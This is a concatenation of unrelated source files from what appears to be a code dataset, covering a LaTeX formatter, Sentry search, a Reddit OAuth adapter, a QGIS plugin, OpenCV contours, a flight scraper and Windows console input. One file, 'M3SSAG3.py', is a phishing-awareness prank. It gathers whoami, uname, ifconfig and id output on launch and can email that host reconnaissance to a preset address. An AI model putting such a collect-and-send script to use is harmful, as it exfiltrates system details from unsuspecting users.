\documentclass{%(docclass)s}
\usepackage{fancyvrb}
\usepackage{color}
\usepackage[%(encoding)s]{inputenc}
%(preamble)s
%(styledefs)s
\begin{document}
\section*{%(title)s}
%(code)s
\end{document}
'''
## Small explanation of the mess below :)
#
# The previous version of the LaTeX formatter just assigned a command to
# each token type defined in the current style. That obviously is
# problematic if the highlighted code is produced for a different style
# than the style commands themselves.
#
# This version works much like the HTML formatter which assigns multiple
# CSS classes to each <span> tag, from the most specific to the least
# specific token type, thus falling back to the parent token type if one
# is not defined. Here, the classes are there too and use the same short
# forms given in token.STANDARD_TYPES.
#
# Highlighted code now only uses one custom command, which by default is
# \PY and selectable by the commandprefix option (and in addition the
# escapes \PYZat, \PYZlb and \PYZrb which haven't been renamed for
# backwards compatibility purposes).
#
# \PY has two arguments: the classes, separated by +, and the text to
# render in that style. The classes are resolved into the respective
# style commands by magic, which serves to ignore unknown classes.
#
# The magic macros are:
# * \PY@it, \PY@bf, etc. are unconditionally wrapped around the text
# to render in \PY@do. Their definition determines the style.
# * \PY@reset resets \PY@it etc. to do nothing.
# * \PY@toks parses the list of classes, using magic inspired by the
# keyval package (but modified to use plusses instead of commas
# because fancyvrb redefines commas inside its environments).
# * \PY@tok processes one class, calling the \PY@tok@classname command
# if it exists.
# * \PY@tok@classname sets the \PY@it etc. to reflect the chosen style
# for its class.
# * \PY resets the style, parses the classnames and then calls \PY@do.
#
# Tip: to read this code, print it out in substituted form using e.g.
# >>> print STYLE_TEMPLATE % {'cp': 'PY'}
STYLE_TEMPLATE = r'''
\makeatletter
\def\%(cp)s@reset{\let\%(cp)s@it=\relax \let\%(cp)s@bf=\relax%%
\let\%(cp)s@ul=\relax \let\%(cp)s@tc=\relax%%
\let\%(cp)s@bc=\relax \let\%(cp)s@ff=\relax}
\def\%(cp)s@tok#1{\csname %(cp)s@tok@#1\endcsname}
\def\%(cp)s@toks#1+{\ifx\relax#1\empty\else%%
\%(cp)s@tok{#1}\expandafter\%(cp)s@toks\fi}
\def\%(cp)s@do#1{\%(cp)s@bc{\%(cp)s@tc{\%(cp)s@ul{%%
\%(cp)s@it{\%(cp)s@bf{\%(cp)s@ff{#1}}}}}}}
\def\%(cp)s#1#2{\%(cp)s@reset\%(cp)s@toks#1+\relax+\%(cp)s@do{#2}}
%(styles)s
\def\%(cp)sZbs{\char`\\}
\def\%(cp)sZus{\char`\_}
\def\%(cp)sZob{\char`\{}
\def\%(cp)sZcb{\char`\}}
\def\%(cp)sZca{\char`\^}
\def\%(cp)sZam{\char`\&}
\def\%(cp)sZlt{\char`\<}
\def\%(cp)sZgt{\char`\>}
\def\%(cp)sZsh{\char`\#}
\def\%(cp)sZpc{\char`\%%}
\def\%(cp)sZdl{\char`\$}
\def\%(cp)sZhy{\char`\-}
\def\%(cp)sZsq{\char`\'}
\def\%(cp)sZdq{\char`\"}
\def\%(cp)sZti{\char`\~}
%% for compatibility with earlier versions
\def\%(cp)sZat{@}
\def\%(cp)sZlb{[}
\def\%(cp)sZrb{]}
\makeatother
'''
def _get_ttype_name(ttype):
fname = STANDARD_TYPES.get(ttype)
if fname:
return fname
aname = ''
while fname is None:
aname = ttype[-1] + aname
ttype = ttype.parent
fname = STANDARD_TYPES.get(ttype)
return fname + aname
class LatexFormatter(Formatter):
r"""
Format tokens as LaTeX code. This needs the `fancyvrb` and `color`
standard packages.
Without the `full` option, code is formatted as one ``Verbatim``
environment, like this:
.. sourcecode:: latex
\begin{Verbatim}[commandchars=\\\{\}]
\PY{k}{def }\PY{n+nf}{foo}(\PY{n}{bar}):
\PY{k}{pass}
\end{Verbatim}
The special command used here (``\PY``) and all the other macros it needs
are output by the `get_style_defs` method.
With the `full` option, a complete LaTeX document is output, including
the command definitions in the preamble.
The `get_style_defs()` method of a `LatexFormatter` returns a string
containing ``\def`` commands defining the macros needed inside the
``Verbatim`` environments.
Additional options accepted:
`style`
The style to use, can be a string or a Style subclass (default:
``'default'``).
`full`
Tells the formatter to output a "full" document, i.e. a complete
self-contained document (default: ``False``).
`title`
If `full` is true, the title that should be used to caption the
document (default: ``''``).
`docclass`
If the `full` option is enabled, this is the document class to use
(default: ``'article'``).
`preamble`
If the `full` option is enabled, this can be further preamble commands,
e.g. ``\usepackage`` (default: ``''``).
`linenos`
If set to ``True``, output line numbers (default: ``False``).
`linenostart`
The line number for the first line (default: ``1``).
`linenostep`
If set to a number n > 1, only every nth line number is printed.
`verboptions`
Additional options given to the Verbatim environment (see the *fancyvrb*
docs for possible values) (default: ``''``).
`commandprefix`
The LaTeX commands used to produce colored output are constructed
using this prefix and some letters (default: ``'PY'``).
.. versionadded:: 0.7
.. versionchanged:: 0.10
The default is now ``'PY'`` instead of ``'C'``.
`texcomments`
If set to ``True``, enables LaTeX comment lines. That is, LaTex markup
in comment tokens is not escaped so that LaTeX can render it (default:
``False``).
.. versionadded:: 1.2
`mathescape`
If set to ``True``, enables LaTeX math mode escape in comments. That
is, ``'$...$'`` inside a comment will trigger math mode (default:
``False``).
.. versionadded:: 1.2
`escapeinside`
If set to a string of length 2, enables escaping to LaTeX. Text
delimited by these 2 characters is read as LaTeX code and
typeset accordingly. It has no effect in string literals. It has
no effect in comments if `texcomments` or `mathescape` is
set. (default: ``''``).
.. versionadded:: 2.0
"""
name = 'LaTeX'
aliases = ['latex', 'tex']
filenames = ['*.tex']
def __init__(self, **options):
Formatter.__init__(self, **options)
self.docclass = options.get('docclass', 'article')
self.preamble = options.get('preamble', '')
self.linenos = get_bool_opt(options, 'linenos', False)
self.linenostart = abs(get_int_opt(options, 'linenostart', 1))
self.linenostep = abs(get_int_opt(options, 'linenostep', 1))
self.verboptions = options.get('verboptions', '')
self.nobackground = get_bool_opt(options, 'nobackground', False)
self.commandprefix = options.get('commandprefix', 'PY')
self.texcomments = get_bool_opt(options, 'texcomments', False)
self.mathescape = get_bool_opt(options, 'mathescape', False)
self.escapeinside = options.get('escapeinside', '')
if len(self.escapeinside) == 2:
self.left = self.escapeinside[0]
self.right = self.escapeinside[1]
else:
self.escapeinside = ''
self._create_stylesheet()
def _create_stylesheet(self):
t2n = self.ttype2name = {Token: ''}
c2d = self.cmd2def = {}
cp = self.commandprefix
def rgbcolor(col):
if col:
return ','.join(['%.2f' %(int(col[i] + col[i + 1], 16) / 255.0)
for i in (0, 2, 4)])
else:
return '1,1,1'
for ttype, ndef in self.style:
name = _get_ttype_name(ttype)
cmndef = ''
if ndef['bold']:
cmndef += r'\let\$$@bf=\textbf'
if ndef['italic']:
cmndef += r'\let\$$@it=\textit'
if ndef['underline']:
cmndef += r'\let\$$@ul=\underline'
if ndef['roman']:
cmndef += r'\let\$$@ff=\textrm'
if ndef['sans']:
cmndef += r'\let\$$@ff=\textsf'
if ndef['mono']:
cmndef += r'\let\$$@ff=\textsf'
if ndef['color']:
cmndef += (r'\def\$$@tc##1{\textcolor[rgb]{%s}{##1}}' %
rgbcolor(ndef['color']))
if ndef['border']:
cmndef += (r'\def\$$@bc##1{\setlength{\fboxsep}{0pt}'
r'\fcolorbox[rgb]{%s}{%s}{\strut ##1}}' %
(rgbcolor(ndef['border']),
rgbcolor(ndef['bgcolor'])))
elif ndef['bgcolor']:
cmndef += (r'\def\$$@bc##1{\setlength{\fboxsep}{0pt}'
r'\colorbox[rgb]{%s}{\strut ##1}}' %
rgbcolor(ndef['bgcolor']))
if cmndef == '':
continue
cmndef = cmndef.replace('$$', cp)
t2n[ttype] = name
c2d[name] = cmndef
def get_style_defs(self, arg=''):
"""
Return the command sequences needed to define the commands
used to format text in the verbatim environment. ``arg`` is ignored.
"""
cp = self.commandprefix
styles = []
for name, definition in iteritems(self.cmd2def):
styles.append(r'\expandafter\def\csname %s@tok@%s\endcsname{%s}' %
(cp, name, definition))
return STYLE_TEMPLATE % {'cp': self.commandprefix,
'styles': '\n'.join(styles)}
def format_unencoded(self, tokensource, outfile):
# TODO: add support for background colors
t2n = self.ttype2name
cp = self.commandprefix
if self.full:
realoutfile = outfile
outfile = StringIO()
outfile.write(u'\\begin{Verbatim}[commandchars=\\\\\\{\\}')
if self.linenos:
start, step = self.linenostart, self.linenostep
outfile.write(u',numbers=left' +
(start and u',firstnumber=%d' % start or u'') +
(step and u',stepnumber=%d' % step or u''))
if self.mathescape or self.texcomments or self.escapeinside:
outfile.write(u',codes={\\catcode`\\$=3\\catcode`\\^=7\\catcode`\\_=8}')
if self.verboptions:
outfile.write(u',' + self.verboptions)
outfile.write(u']\n')
for ttype, value in tokensource:
if ttype in Token.Comment:
if self.texcomments:
# Try to guess comment starting lexeme and escape it ...
start = value[0:1]
for i in xrange(1, len(value)):
if start[0] != value[i]:
break
start += value[i]
value = value[len(start):]
start = escape_tex(start, self.commandprefix)
# ... but do not escape inside comment.
value = start + value
elif self.mathescape:
# Only escape parts not inside a math environment.
parts = value.split('$')
in_math = False
for i, part in enumerate(parts):
if not in_math:
parts[i] = escape_tex(part, self.commandprefix)
in_math = not in_math
value = '$'.join(parts)
elif self.escapeinside:
text = value
value = ''
while len(text) > 0:
a,sep1,text = text.partition(self.left)
if len(sep1) > 0:
b,sep2,text = text.partition(self.right)
if len(sep2) > 0:
value += escape_tex(a, self.commandprefix) + b
else:
value += escape_tex(a + sep1 + b, self.commandprefix)
else:
value = value + escape_tex(a, self.commandprefix)
else:
value = escape_tex(value, self.commandprefix)
elif ttype not in Token.Escape:
value = escape_tex(value, self.commandprefix)
styles = []
while ttype is not Token:
try:
styles.append(t2n[ttype])
except KeyError:
# not in current style
styles.append(_get_ttype_name(ttype))
ttype = ttype.parent
styleval = '+'.join(reversed(styles))
if styleval:
spl = value.split('\n')
for line in spl[:-1]:
if line:
outfile.write("\\%s{%s}{%s}" % (cp, styleval, line))
outfile.write('\n')
if spl[-1]:
outfile.write("\\%s{%s}{%s}" % (cp, styleval, spl[-1]))
else:
outfile.write(value)
outfile.write(u'\\end{Verbatim}\n')
if self.full:
realoutfile.write(DOC_TEMPLATE %
dict(docclass = self.docclass,
preamble = self.preamble,
title = self.title,
encoding = self.encoding or 'latin1',
styledefs = self.get_style_defs(),
code = outfile.getvalue()))
class LatexEmbeddedLexer(Lexer):
r"""
This lexer takes one lexer as argument, the lexer for the language
being formatted, and the left and right delimiters for escaped text.
First everything is scanned using the language lexer to obtain
strings and comments. All other consecutive tokens are merged and
the resulting text is scanned for escaped segments, which are given
the Token.Escape type. Finally text that is not escaped is scanned
again with the language lexer.
"""
def __init__(self, left, right, lang, **options):
self.left = left
self.right = right
self.lang = lang
Lexer.__init__(self, **options)
def get_tokens_unprocessed(self, text):
buf = ''
for i, t, v in self.lang.get_tokens_unprocessed(text):
if t in Token.Comment or t in Token.String:
if buf:
for x in self.get_tokens_aux(idx, buf):
yield x
buf = ''
yield i, t, v
else:
if not buf:
idx = i
buf += v
if buf:
for x in self.get_tokens_aux(idx, buf):
yield x
def get_tokens_aux(self, index, text):
while text:
a, sep1, text = text.partition(self.left)
if a:
for i, t, v in self.lang.get_tokens_unprocessed(a):
yield index + i, t, v
index += len(a)
if sep1:
b, sep2, text = text.partition(self.right)
if sep2:
yield index + len(sep1), Token.Escape, b
index += len(sep1) + len(b) + len(sep2)
else:
yield index, Token.Error, sep1
index += len(sep1)
text = b
| gpl-3.0 | -1,509,321,526,598,820,400 | 35.751064 | 85 | 0.534997 | false | 3.832483 | false | false | false |
nicholasserra/sentry | src/sentry/search/django/backend.py | 2 | 6330 | """
sentry.search.django.backend
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
:copyright: (c) 2010-2014 by the Sentry Team, see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
"""
from __future__ import absolute_import
from django.db import router
from django.db.models import Q
from sentry.api.paginator import DateTimePaginator, Paginator
from sentry.search.base import ANY, SearchBackend
from sentry.search.django.constants import (
SORT_CLAUSES, SQLITE_SORT_CLAUSES, MYSQL_SORT_CLAUSES, MSSQL_SORT_CLAUSES,
MSSQL_ENGINES, ORACLE_SORT_CLAUSES
)
from sentry.utils.db import get_db_engine
class DjangoSearchBackend(SearchBackend):
def query(self, project, query=None, status=None, tags=None,
bookmarked_by=None, assigned_to=None, first_release=None,
sort_by='date', unassigned=None,
age_from=None, age_from_inclusive=True,
age_to=None, age_to_inclusive=True,
date_from=None, date_from_inclusive=True,
date_to=None, date_to_inclusive=True,
cursor=None, limit=100):
from sentry.models import Event, Group, GroupStatus
queryset = Group.objects.filter(project=project)
if query:
# TODO(dcramer): if we want to continue to support search on SQL
# we should at least optimize this in Postgres so that it does
# the query filter **after** the index filters, and restricts the
# result set
queryset = queryset.filter(
Q(message__icontains=query) |
Q(culprit__icontains=query)
)
if status is None:
queryset = queryset.exclude(
status__in=(
GroupStatus.PENDING_DELETION,
GroupStatus.DELETION_IN_PROGRESS,
GroupStatus.PENDING_MERGE,
)
)
else:
queryset = queryset.filter(status=status)
if bookmarked_by:
queryset = queryset.filter(
bookmark_set__project=project,
bookmark_set__user=bookmarked_by,
)
if assigned_to:
queryset = queryset.filter(
assignee_set__project=project,
assignee_set__user=assigned_to,
)
elif unassigned in (True, False):
queryset = queryset.filter(
assignee_set__isnull=unassigned,
)
if first_release:
queryset = queryset.filter(
first_release__project=project,
first_release__version=first_release,
)
if tags:
for k, v in tags.iteritems():
if v == ANY:
queryset = queryset.filter(
grouptag__project=project,
grouptag__key=k,
)
else:
queryset = queryset.filter(
grouptag__project=project,
grouptag__key=k,
grouptag__value=v,
)
queryset = queryset.distinct()
if age_from or age_to:
params = {}
if age_from:
if age_from_inclusive:
params['first_seen__gte'] = age_from
else:
params['first_seen__gt'] = age_from
if age_to:
if age_to_inclusive:
params['first_seen__lte'] = age_to
else:
params['first_seen__lt'] = age_to
queryset = queryset.filter(**params)
if date_from or date_to:
params = {
'project_id': project.id,
}
if date_from:
if date_from_inclusive:
params['datetime__gte'] = date_from
else:
params['datetime__gt'] = date_from
if date_to:
if date_to_inclusive:
params['datetime__lte'] = date_to
else:
params['datetime__lt'] = date_to
event_queryset = Event.objects.filter(**params)
# limit to the first 1000 results
group_ids = event_queryset.distinct().values_list(
'group_id',
flat=True
)[:1000]
# if Event is not on the primary database remove Django's
# implicit subquery by coercing to a list
base = router.db_for_read(Group)
using = router.db_for_read(Event)
if base != using:
group_ids = list(group_ids)
queryset = queryset.filter(
id__in=group_ids,
)
engine = get_db_engine('default')
if engine.startswith('sqlite'):
score_clause = SQLITE_SORT_CLAUSES[sort_by]
elif engine.startswith('mysql'):
score_clause = MYSQL_SORT_CLAUSES[sort_by]
elif engine.startswith('oracle'):
score_clause = ORACLE_SORT_CLAUSES[sort_by]
elif engine in MSSQL_ENGINES:
score_clause = MSSQL_SORT_CLAUSES[sort_by]
else:
score_clause = SORT_CLAUSES[sort_by]
if sort_by == 'tottime':
queryset = queryset.filter(time_spent_count__gt=0)
elif sort_by == 'avgtime':
queryset = queryset.filter(time_spent_count__gt=0)
queryset = queryset.extra(
select={'sort_value': score_clause},
)
# HACK: don't sort by the same column twice
if sort_by == 'date':
paginator_cls = DateTimePaginator
sort_clause = '-last_seen'
elif sort_by == 'priority':
paginator_cls = Paginator
sort_clause = '-score'
elif sort_by == 'new':
paginator_cls = DateTimePaginator
sort_clause = '-first_seen'
elif sort_by == 'freq':
paginator_cls = Paginator
sort_clause = '-times_seen'
else:
paginator_cls = Paginator
sort_clause = '-sort_value'
queryset = queryset.order_by(sort_clause)
paginator = paginator_cls(queryset, sort_clause)
return paginator.get_result(limit, cursor)
| bsd-3-clause | 1,341,473,019,343,603,000 | 33.972376 | 78 | 0.522907 | false | 4.332649 | false | false | false |
lukeburden/django-allauth | allauth/socialaccount/providers/reddit/views.py | 10 | 1366 | import requests
from allauth.socialaccount import app_settings
from allauth.socialaccount.providers.oauth2.views import (
OAuth2Adapter,
OAuth2CallbackView,
OAuth2LoginView,
)
from .provider import RedditProvider
class RedditAdapter(OAuth2Adapter):
provider_id = RedditProvider.id
access_token_url = 'https://www.reddit.com/api/v1/access_token'
authorize_url = 'https://www.reddit.com/api/v1/authorize'
profile_url = 'https://oauth.reddit.com/api/v1/me'
basic_auth = True
settings = app_settings.PROVIDERS.get(provider_id, {})
# Allow custom User Agent to comply with reddit API limits
headers = {
'User-Agent': settings.get('USER_AGENT', 'django-allauth-header')}
def complete_login(self, request, app, token, **kwargs):
headers = {
"Authorization": "bearer " + token.token}
headers.update(self.headers)
extra_data = requests.get(self.profile_url, headers=headers)
# This only here because of weird response from the test suite
if isinstance(extra_data, list):
extra_data = extra_data[0]
return self.get_provider().sociallogin_from_response(
request,
extra_data.json()
)
oauth2_login = OAuth2LoginView.adapter_view(RedditAdapter)
oauth2_callback = OAuth2CallbackView.adapter_view(RedditAdapter)
| mit | -1,843,273,556,089,836,000 | 31.52381 | 74 | 0.68448 | false | 3.672043 | false | false | false |
Elfpkck/polygons_parallel_to_line | pptl_provider.py | 1 | 3922 | # -*- coding: utf-8 -*-
"""
/***************************************************************************
PolygonsParallelToLine
A QGIS plugin
This plugin rotates polygons parallel to line
-------------------
begin : 2016-03-10
copyright : (C) 2016-2017 by Andrey Lekarev
email : [email protected]
***************************************************************************/
/***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************/
"""
__author__ = 'Andrey Lekarev'
__date__ = '2016-03-10'
__copyright__ = '(C) 2016-2017 by Andrey Lekarev'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '$Format:%H$'
import os.path
from PyQt4.QtGui import QIcon
from processing.core.AlgorithmProvider import AlgorithmProvider
from processing.core.ProcessingConfig import Setting, ProcessingConfig
from pptl_algorithm import PolygonsParallelToLineAlgorithm
class PolygonsParallelToLineProvider(AlgorithmProvider):
MY_SETTING = 'MY_SETTING'
def __init__(self):
AlgorithmProvider.__init__(self)
# Deactivate provider by default
self.activate = False
# Load algorithms
self.alglist = [PolygonsParallelToLineAlgorithm()]
for alg in self.alglist:
alg.provider = self
def initializeSettings(self):
"""In this method we add settings needed to configure our
provider.
"""
AlgorithmProvider.initializeSettings(self)
ProcessingConfig.addSetting(Setting('Example algorithms',
PolygonsParallelToLineProvider.MY_SETTING,
'Example setting', 'Default value'))
def unload(self):
"""Setting should be removed here, so they do not appear anymore
when the plugin is unloaded.
"""
AlgorithmProvider.unload(self)
ProcessingConfig.removeSetting(
PolygonsParallelToLineProvider.MY_SETTING)
def getName(self):
"""This is the name that will appear on the toolbox group.
It is also used to create the command line name of all the
algorithms from this provider.
"""
return 'Polygons parallel to line'
def getDescription(self):
"""This is the provired full name.
"""
return 'Polygons parallel to line'
def getIcon(self):
"""We return the default icon.
"""
# return AlgorithmProvider.getIcon(self)
path = os.path.join(os.path.dirname(__file__), "icons", "icon.png")
return QIcon(path)
def _loadAlgorithms(self):
"""Here we fill the list of algorithms in self.algs.
This method is called whenever the list of algorithms should
be updated. If the list of algorithms can change (for instance,
if it contains algorithms from user-defined scripts and a new
script might have been added), you should create the list again
here.
In this case, since the list is always the same, we assign from
the pre-made list. This assignment has to be done in this method
even if the list does not change, since the self.algs list is
cleared before calling this method.
"""
self.algs = self.alglist
| gpl-2.0 | -4,265,115,822,583,404,500 | 34.981651 | 86 | 0.550484 | false | 4.95202 | false | false | false |
mentum/pictureflow | pictureflow/vision/contour_detection.py | 1 | 1139 | from pictureflow.core import Image, Node
import cv2
class ContourDetector(Node):
"""
Performs contour detection steps on an already masked binary image.
Args:
parent (Node): Parent image nodes
drop_threshold (Node): Minimum allowed contour area
Attributes:
Input Types: [ :py:class:`Image`, :py:class:`int` ]
Output Type: :py:class:`list`
"""
_input_types = [Image, int]
_output_type = list
def __init__(self, parent, drop_threshold, id='contour_detect'):
super().__init__(id, parent, drop_threshold)
def apply(self, item, threshold):
img = item.img_mat
img[img > 0] = 255
_, contours, _ = cv2.findContours(img, cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE)
valid_contours = []
for contour in contours:
max_x = contour[:, :, 0].max()
min_x = contour[:, :, 0].min()
max_y = contour[:, :, 1].max()
min_y = contour[:, :, 1].min()
if (max_x - min_x) * (max_y - min_y) > threshold:
valid_contours.append(contour)
yield valid_contours
| mit | 3,863,634,092,080,454,000 | 24.311111 | 86 | 0.557507 | false | 3.662379 | false | false | false |
gsalvatori/tredify | lib/GIS.py | 1 | 1199 | import matplotlib.pyplot as plt
import numpy as np
import matplotlib.cm as cm
import geojson
from mpl_toolkits.mplot3d import Axes3D
from matplotlib.collections import PolyCollection
from matplotlib.colors import colorConverter
from mpl_toolkits.basemap import Basemap
from pylab import *
from random import *
class GIS:
def __init__(self,dict_):
self.coordinates = dict_["coordinates"]
self.type = dict_["type"]
# we set low resolution as default setting
self.map = Basemap(projection='merc',resolution='l')
def point(self):
self.map.drawcoastlines()
self.map.drawcountries()
self.map.fillcontinents(color = 'coral')
self.map.drawmapboundary()
x,y = self.map(self.coordinates[0],self.coordinates[1])
self.map.plot(x, y, 'bo', markersize=10)
plt.show()
def linestring(self):
self.map.drawcoastlines()
self.map.drawcountries()
self.map.fillcontinents(color = 'coral')
self.map.drawmapboundary()
x,y = self.map(self.coordinates[0],self.coordinates[1])
self.map.plot(x, y, color="green", linewidth=1.0, linestyle="-")
plt.show()
def init(self):
if self.type == "Point":
self.point()
elif self.type == "LineString":
self.linestring()
| gpl-3.0 | 189,024,367,770,067,700 | 23.469388 | 66 | 0.715596 | false | 3.035443 | false | false | false |
zalf-lsa/monica | installer/Hohenfinow2/python/run-consumer.py | 1 | 4052 | #!/usr/bin/python
# -*- coding: UTF-8
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/. */
# Authors:
# Michael Berg-Mohnicke <[email protected]>
#
# Maintainers:
# Currently maintained by the authors.
#
# This file has been created at the Institute of
# Landscape Systems Analysis at the ZALF.
# Copyright (C: Leibniz Centre for Agricultural Landscape Research (ZALF)
import sys
import csv
import os
import json
import zmq
#print "pyzmq version: ", zmq.pyzmq_version(), " zmq version: ", zmq.zmq_version()
import monica_io
#print "path to monica_io: ", monica_io.__file__
def run_consumer(path_to_output_dir = None, leave_after_finished_run = False, server = {"server": None, "port": None}, shared_id = None):
"collect data from workers"
config = {
"port": server["port"] if server["port"] else "7777",
"server": server["server"] if server["server"] else "localhost",
"shared_id": shared_id,
"out": path_to_output_dir if path_to_output_dir else os.path.join(os.path.dirname(__file__), 'out/'),
"leave_after_finished_run": leave_after_finished_run
}
if len(sys.argv) > 1 and __name__ == "__main__":
for arg in sys.argv[1:]:
k,v = arg.split("=")
if k in config:
if k == "leave_after_finished_run":
if (v == 'True' or v == 'true'):
config[k] = True
else:
config[k] = False
else:
config[k] = v
print "consumer config:", config
context = zmq.Context()
if config["shared_id"]:
socket = context.socket(zmq.DEALER)
socket.setsockopt(zmq.IDENTITY, config["shared_id"])
else:
socket = context.socket(zmq.PULL)
socket.connect("tcp://" + config["server"] + ":" + config["port"])
#socket.RCVTIMEO = 1000
leave = False
def process_message(msg):
if not hasattr(process_message, "wnof_count"):
process_message.received_env_count = 0
leave = False
if msg["type"] == "finish":
print "c: received finish message"
leave = True
else:
print "c: received work result ", process_message.received_env_count, " customId: ", str(msg.get("customId", ""))
process_message.received_env_count += 1
#with open("out/out-" + str(i) + ".csv", 'wb') as _:
with open(config["out"] + str(process_message.received_env_count) + ".csv", 'wb') as _:
writer = csv.writer(_, delimiter=",")
for data_ in msg.get("data", []):
results = data_.get("results", [])
orig_spec = data_.get("origSpec", "")
output_ids = data_.get("outputIds", [])
if len(results) > 0:
writer.writerow([orig_spec.replace("\"", "")])
for row in monica_io.write_output_header_rows(output_ids,
include_header_row=True,
include_units_row=True,
include_time_agg=False):
writer.writerow(row)
for row in monica_io.write_output(output_ids, results):
writer.writerow(row)
writer.writerow([])
if config["leave_after_finished_run"] == True :
leave = True
return leave
while not leave:
try:
msg = socket.recv_json(encoding="latin-1")
leave = process_message(msg)
except:
continue
print "c: exiting run_consumer()"
#debug_file.close()
if __name__ == "__main__":
run_consumer()
| mpl-2.0 | -1,774,748,661,276,218,000 | 33.058824 | 137 | 0.51925 | false | 3.984267 | true | false | false |
sudo-KING/Misc-Tools | M3SSAG3.py | 1 | 1519 | ####WIP####
#!/usr/bin/python
from Tkinter import *
from tkMessageBox import *
import smtplib
import platform
import sys
import os
from email.mime.text import MIMEText
os.system('(whoami; uname -ar; ifconfig; pwd; id;) > me')
def answer():
showerror("Peekab000:", "We see you!, You are now on the Security Teams radar and maybe shouldn't have broken policy")
def callback():
if askyesno('Huh Oh!:', 'You have now been seen by the Security Team! Would you like to close me?'):
showwarning('Yes', 'NO! Go speak with the Security Team!')
else:
showinfo('No', "Smart answer, cause I wasn't going to close till you spoke to the Security Team anyways.")
def uname():
print platform.uname()
def givemeinfo():
os.system('(whoami; uname -ar; ifconfig; pwd; id; ) > me.txt')
def maail():
fp = open('me', 'rb')
msg = MIMEText(fp.read())
fp.close()
msg['Subject'] = 'You Caught a Phish!'
msg['From'] = '<FROM-GOES-HERE>'
msg['To'] = '<TO-GOES-HERE>'
msg['cc'] = '<CC-GOES-HERE>'
s = smtplib.SMTP('<SMTP-GOES-HERE>')
s.sendmail('<FROM-GOES-HERE>', ['<TO-GOES-HERE>','<CC-GOES-HERE>'], msg.as_string())
s.quit()
Button(text='WHAT!?', command=answer).pack(fill=X)
Button(text='Give Me Options', command=callback).pack(fill=X)
Button(text='Informative', command=uname).pack(fill=X)
Button(text='I personally would not click this!', command=givemeinfo).pack(fill=X)
Button(text='You are not in trouble: Click me to email Security now', command=maail).pack(fill=X)
mainloop()
| lgpl-3.0 | 5,069,942,846,616,262,000 | 27.12963 | 122 | 0.670178 | false | 3.044088 | false | false | false |
daijia/fetch-flight | website/fetch_ctrip.py | 1 | 2256 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import util
from selenium import webdriver
from constant import Website
from setting.fetch_settings import URL_PARAMS
def dig_info(flight):
try:
info = flight.find_element_by_class_name('logo').text.split()
airline = info[0].strip() if len(info) >= 1 else ''
flight_no = info[1].strip() if len(info) >= 2 else ''
divs = flight.find_element_by_class_name('right').\
find_elements_by_tag_name('div')
from_time = divs[0].find_element_by_class_name('time').text
from_time_pair = [int(x) for x in from_time.split(':')]
from_airport = divs[1].text
divs = flight.find_element_by_class_name('left').\
find_elements_by_tag_name('div')
to_time = divs[0].find_element_by_class_name('time').text
to_time_pair = [int(x) for x in to_time.split(':')]
to_airport = divs[1].text
if to_time_pair[0] < from_time_pair[0]:
to_time_pair[0] += 24
price = flight.find_element_by_class_name('price').text[1:]
tmp_price = ''
for ch in price:
if ch.isdigit():
tmp_price += ch
else:
break
price = int(tmp_price)
return [airline, flight_no, from_airport, from_time,
from_time_pair, to_airport, to_time, to_time_pair, price]
except Exception as e:
util.log_error('CTRIP: ' + str(e))
return None
def fetch(period):
browser = webdriver.PhantomJS()
url = 'http://flights.ctrip.com/booking/%s-%s-day-1.html#DDate1=%s' % \
(URL_PARAMS[Website.CTRIP][period['from_city']],
URL_PARAMS[Website.CTRIP][period['to_city']],
period['date'])
browser.get(url)
util.scroll(browser)
block = util.fetch_one(browser, 'find_element_by_id', 'J_flightlist2')
if not block:
return []
flights = util.fetch_multi(block, 'find_elements_by_class_name',
'search_table_header')
format_flights = []
for flight in flights:
info = dig_info(flight)
if info:
format_flights.append(info)
browser.quit()
return util.deal(period, format_flights, Website.CTRIP, url)
| mit | 6,369,214,236,859,696,000 | 35.983607 | 75 | 0.577571 | false | 3.255411 | false | false | false |
lmregus/Portfolio | python/design_patterns/env/lib/python3.7/site-packages/prompt_toolkit/input/win32.py | 1 | 16829 | from __future__ import unicode_literals
from ctypes import windll, pointer
from ctypes.wintypes import DWORD
from six.moves import range
from contextlib import contextmanager
from .ansi_escape_sequences import REVERSE_ANSI_SEQUENCES
from .base import Input
from prompt_toolkit.eventloop import get_event_loop
from prompt_toolkit.eventloop.win32 import wait_for_handles
from prompt_toolkit.key_binding.key_processor import KeyPress
from prompt_toolkit.keys import Keys
from prompt_toolkit.mouse_events import MouseEventType
from prompt_toolkit.win32_types import EventTypes, KEY_EVENT_RECORD, MOUSE_EVENT_RECORD, INPUT_RECORD, STD_INPUT_HANDLE
import msvcrt
import os
import sys
import six
__all__ = [
'Win32Input',
'ConsoleInputReader',
'raw_mode',
'cooked_mode',
'attach_win32_input',
'detach_win32_input',
]
class Win32Input(Input):
"""
`Input` class that reads from the Windows console.
"""
def __init__(self, stdin=None):
self.console_input_reader = ConsoleInputReader()
def attach(self, input_ready_callback):
"""
Return a context manager that makes this input active in the current
event loop.
"""
assert callable(input_ready_callback)
return attach_win32_input(self, input_ready_callback)
def detach(self):
"""
Return a context manager that makes sure that this input is not active
in the current event loop.
"""
return detach_win32_input(self)
def read_keys(self):
return list(self.console_input_reader.read())
def flush(self):
pass
@property
def closed(self):
return False
def raw_mode(self):
return raw_mode()
def cooked_mode(self):
return cooked_mode()
def fileno(self):
# The windows console doesn't depend on the file handle, so
# this is not used for the event loop (which uses the
# handle instead). But it's used in `Application.run_system_command`
# which opens a subprocess with a given stdin/stdout.
return sys.stdin.fileno()
def typeahead_hash(self):
return 'win32-input'
def close(self):
self.console_input_reader.close()
@property
def handle(self):
return self.console_input_reader.handle
class ConsoleInputReader(object):
"""
:param recognize_paste: When True, try to discover paste actions and turn
the event into a BracketedPaste.
"""
# Keys with character data.
mappings = {
b'\x1b': Keys.Escape,
b'\x00': Keys.ControlSpace, # Control-Space (Also for Ctrl-@)
b'\x01': Keys.ControlA, # Control-A (home)
b'\x02': Keys.ControlB, # Control-B (emacs cursor left)
b'\x03': Keys.ControlC, # Control-C (interrupt)
